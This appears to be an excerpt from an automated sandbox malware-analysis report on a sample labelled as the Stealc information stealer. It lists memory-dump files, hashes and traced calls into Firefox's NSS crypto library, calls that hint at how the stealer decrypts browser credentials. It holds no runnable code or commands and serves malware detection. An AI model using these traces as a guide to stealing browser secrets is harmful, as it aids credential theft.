                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 491875419-598938438
                                                                                                                                                                            • Opcode ID: ab469917ca6caf5b067c121833482c7567490ebc25f2ad22c52317a4c53adfd7
                                                                                                                                                                            • Instruction ID: 6ebf2967e161234ba44fdf03cac6bb4f4ac1c18ef3f9223846d86c8687f4f4bf
                                                                                                                                                                            • Opcode Fuzzy Hash: ab469917ca6caf5b067c121833482c7567490ebc25f2ad22c52317a4c53adfd7
                                                                                                                                                                            • Instruction Fuzzy Hash: 69616A71A042208BD320CF29C940BA6B7F5EF95318F69856DE4489FF82D376D847C7A2
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C8DCD08
                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6C8DCE16
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8DD079
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1351604052-0
                                                                                                                                                                            • Opcode ID: cf32c442cc281c1d326a486172b0a35455d341be4066bb1b225a50d87227f3f0
                                                                                                                                                                            • Instruction ID: ea760a225c81856fff71528361a7a6052f7c6e623136710a1ac348f5cec115e6
                                                                                                                                                                            • Opcode Fuzzy Hash: cf32c442cc281c1d326a486172b0a35455d341be4066bb1b225a50d87227f3f0
                                                                                                                                                                            • Instruction Fuzzy Hash: FAC1CFB1A002199BDB20DF28CD80BDAB7B4BF48318F1545A9E84CA7741E775EE95CF90
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C8D97C1,?,00000000,00000000,?,?,?,00000000,?,6C8B7F4A,00000000), ref: 6C8CDC68
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDD36
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDE2D
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDE43
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDE76
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDF32
                                                                                                                                                                            • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDF5F
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDF78
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C8B7F4A,00000000,?,00000000,00000000), ref: 6C8CDFAA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1886645929-0
                                                                                                                                                                            • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                            • Instruction ID: 501c73b48678fab200017f4554d692e14cb46f91a5c52b06f83654b1abc7bb61
                                                                                                                                                                            • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                            • Instruction Fuzzy Hash: C581C5B0BC66048BFB346B19CA9035972D2EB60748F208C3BE919CAFE1E774C484C653
                                                                                                                                                                            APIs
                                                                                                                                                                            • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C8A3C76
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6C8A3C94
                                                                                                                                                                              • Part of subcall function 6C8995B0: TlsGetValue.KERNEL32(00000000,?,6C8B00D2,00000000), ref: 6C8995D2
                                                                                                                                                                              • Part of subcall function 6C8995B0: EnterCriticalSection.KERNEL32(?,?,?,6C8B00D2,00000000), ref: 6C8995E7
                                                                                                                                                                              • Part of subcall function 6C8995B0: PR_Unlock.NSS3(?,?,?,?,6C8B00D2,00000000), ref: 6C899605
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6C8A3CB2
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C8A3CCA
                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C8A3CE1
                                                                                                                                                                              • Part of subcall function 6C8A3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8BAE42), ref: 6C8A30AA
                                                                                                                                                                              • Part of subcall function 6C8A3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8A30C7
                                                                                                                                                                              • Part of subcall function 6C8A3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C8A30E5
                                                                                                                                                                              • Part of subcall function 6C8A3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8A3116
                                                                                                                                                                              • Part of subcall function 6C8A3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8A312B
                                                                                                                                                                              • Part of subcall function 6C8A3090: PK11_DestroyObject.NSS3(?,?), ref: 6C8A3154
                                                                                                                                                                              • Part of subcall function 6C8A3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A317E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3167935723-0
                                                                                                                                                                            • Opcode ID: f399988df8bac36aa3d6ef30bd6d5fee8e521b3589bb1051690f0e24e5967d2d
                                                                                                                                                                            • Instruction ID: e7016d52828b7551a20cd67cff1406984a7d9bb3a3038c4fb768881c84d23c16
                                                                                                                                                                            • Opcode Fuzzy Hash: f399988df8bac36aa3d6ef30bd6d5fee8e521b3589bb1051690f0e24e5967d2d
                                                                                                                                                                            • Instruction Fuzzy Hash: 3861D9B1A00200BBEB305EA5DE41FA776B9EF14748F094838FD059AA52F731DD25C7A1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8E3440: PK11_GetAllTokens.NSS3 ref: 6C8E3481
                                                                                                                                                                              • Part of subcall function 6C8E3440: PR_SetError.NSS3(00000000,00000000), ref: 6C8E34A3
                                                                                                                                                                              • Part of subcall function 6C8E3440: TlsGetValue.KERNEL32 ref: 6C8E352E
                                                                                                                                                                              • Part of subcall function 6C8E3440: EnterCriticalSection.KERNEL32(?), ref: 6C8E3542
                                                                                                                                                                              • Part of subcall function 6C8E3440: PR_Unlock.NSS3(?), ref: 6C8E355B
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8E3D8B
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8E3D9F
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8E3DCA
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8E3DE2
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C8E3E4F
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8E3E97
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8E3EAB
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8E3ED6
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8E3EEE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2554137219-0
                                                                                                                                                                            • Opcode ID: 7de5fd5cef1365f19367100cbdd872cf4928cbc8712437ef9655430e7ac6cbee
                                                                                                                                                                            • Instruction ID: 6efa3091cefe9f2326e7d23b63c19bf8e4dfab275c35c92dd7480980c2284d87
                                                                                                                                                                            • Opcode Fuzzy Hash: 7de5fd5cef1365f19367100cbdd872cf4928cbc8712437ef9655430e7ac6cbee
                                                                                                                                                                            • Instruction Fuzzy Hash: B9515975A046029FDB21AF28DE4476A73B0EF5A318F140928DE1957F21EB31ED54CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(55252F9C), ref: 6C892C5D
                                                                                                                                                                              • Part of subcall function 6C8F0D30: calloc.MOZGLUE ref: 6C8F0D50
                                                                                                                                                                              • Part of subcall function 6C8F0D30: TlsGetValue.KERNEL32 ref: 6C8F0D6D
                                                                                                                                                                            • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C892C8D
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C892CE0
                                                                                                                                                                              • Part of subcall function 6C892E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C892CDA,?,00000000), ref: 6C892E1E
                                                                                                                                                                              • Part of subcall function 6C892E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C892E33
                                                                                                                                                                              • Part of subcall function 6C892E00: TlsGetValue.KERNEL32 ref: 6C892E4E
                                                                                                                                                                              • Part of subcall function 6C892E00: EnterCriticalSection.KERNEL32(?), ref: 6C892E5E
                                                                                                                                                                              • Part of subcall function 6C892E00: PL_HashTableLookup.NSS3(?), ref: 6C892E71
                                                                                                                                                                              • Part of subcall function 6C892E00: PL_HashTableRemove.NSS3(?), ref: 6C892E84
                                                                                                                                                                              • Part of subcall function 6C892E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C892E96
                                                                                                                                                                              • Part of subcall function 6C892E00: PR_Unlock.NSS3 ref: 6C892EA9
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C892D23
                                                                                                                                                                            • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C892D30
                                                                                                                                                                            • CERT_MakeCANickname.NSS3(00000001), ref: 6C892D3F
                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6C892D73
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6C892DB8
                                                                                                                                                                            • free.MOZGLUE ref: 6C892DC8
                                                                                                                                                                              • Part of subcall function 6C893E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C893EC2
                                                                                                                                                                              • Part of subcall function 6C893E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C893ED6
                                                                                                                                                                              • Part of subcall function 6C893E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C893EEE
                                                                                                                                                                              • Part of subcall function 6C893E60: PR_CallOnce.NSS3(6C9F2AA4,6C8F12D0), ref: 6C893F02
                                                                                                                                                                              • Part of subcall function 6C893E60: PL_FreeArenaPool.NSS3 ref: 6C893F14
                                                                                                                                                                              • Part of subcall function 6C893E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C893F27
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3941837925-0
                                                                                                                                                                            • Opcode ID: 69ba69283fef69c2c09bde273057d8194a44f1c4438c5de41b5fc24d946fe309
                                                                                                                                                                            • Instruction ID: 23111557b9482eec2aadb636c7892728572420ac66583d1be9eefb3a62be92c7
                                                                                                                                                                            • Opcode Fuzzy Hash: 69ba69283fef69c2c09bde273057d8194a44f1c4438c5de41b5fc24d946fe309
                                                                                                                                                                            • Instruction Fuzzy Hash: 7751EE71A052199FEB20DF2CDE88B5B77E5EF94349F150938E85983A20E735E8148B92
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8940D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C893F7F,?,00000055,?,?,6C891666,?,?), ref: 6C8940D9
                                                                                                                                                                              • Part of subcall function 6C8940D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C891666,?,?), ref: 6C8940FC
                                                                                                                                                                              • Part of subcall function 6C8940D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C891666,?,?), ref: 6C894138
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C897CFD
                                                                                                                                                                              • Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07
                                                                                                                                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6C9B9030), ref: 6C897D1B
                                                                                                                                                                              • Part of subcall function 6C8EFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C891A3E,00000048,00000054), ref: 6C8EFD56
                                                                                                                                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6C9B9048), ref: 6C897D2F
                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C897D50
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C897D61
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6C897D7D
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C897D9C
                                                                                                                                                                            • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C897DB8
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C897E19
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 70581797-0
                                                                                                                                                                            • Opcode ID: 303a42368d480bb18f2b6cbf2b8e47b859f2148fe973a89a5e0369a6e7a6c29f
                                                                                                                                                                            • Instruction ID: 7618da4735b48ac47242782a8ee4a21a2e75549fe1822864a9ff0c82caf142ec
                                                                                                                                                                            • Opcode Fuzzy Hash: 303a42368d480bb18f2b6cbf2b8e47b859f2148fe973a89a5e0369a6e7a6c29f
                                                                                                                                                                            • Instruction Fuzzy Hash: 32410772A001199FEB208E6D9D41BAF37E4AF9535DF050834EC19A7B64E730E915C7E1
                                                                                                                                                                            APIs
                                                                                                                                                                            • free.MOZGLUE(?,00000000,00000000,?,?,?,6C8A80DD), ref: 6C8A7F15
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C8A80DD), ref: 6C8A7F36
                                                                                                                                                                            • free.MOZGLUE(?,?,?,6C8A80DD), ref: 6C8A7F3D
                                                                                                                                                                            • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C8A80DD), ref: 6C8A7F5D
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,6C8A80DD), ref: 6C8A7F94
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8A7F9B
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE08B,00000000,6C8A80DD), ref: 6C8A7FD0
                                                                                                                                                                            • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C8A80DD), ref: 6C8A7FE6
                                                                                                                                                                            • free.MOZGLUE(?,6C8A80DD), ref: 6C8A802D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4037168058-0
                                                                                                                                                                            • Opcode ID: 3066390b62b2acc17fe96a0b8d4323ca89d7a2e5b01eeb8f62298d149330bbf5
                                                                                                                                                                            • Instruction ID: 1b5f25a17ae87ed7e4b2aaf11ebe05df1bdb271782960b2e6c0ee7e55bdbe64b
                                                                                                                                                                            • Opcode Fuzzy Hash: 3066390b62b2acc17fe96a0b8d4323ca89d7a2e5b01eeb8f62298d149330bbf5
                                                                                                                                                                            • Instruction Fuzzy Hash: A0410A71B095904FDF209FBDA988B4A3B75AB4B358F340A39E52983B40D730D906C7A5
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8EFF00
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6C8EFF18
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C8EFF26
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6C8EFF4F
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C8EFF7A
                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C8EFF8C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1233137751-0
                                                                                                                                                                            • Opcode ID: e42ad96223e37367bbad6251cea47dba7c737a513fbb6b2790778d7029e25c14
                                                                                                                                                                            • Instruction ID: 1cafa9fcbd57d86f85629fd67493a06fa8673666813fe3c3f592141d16f0f496
                                                                                                                                                                            • Opcode Fuzzy Hash: e42ad96223e37367bbad6251cea47dba7c737a513fbb6b2790778d7029e25c14
                                                                                                                                                                            • Instruction Fuzzy Hash: CC3128F29013169BE7308F58AE40B5776A8AFAB388F140935ED2897740FB71D915C7D1
                                                                                                                                                                            APIs
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C8F536F,00000022,?,?,00000000,?), ref: 6C8F4E70
                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C8F4F28
                                                                                                                                                                            • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C8F4F8E
                                                                                                                                                                            • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C8F4FAE
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8F4FC8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
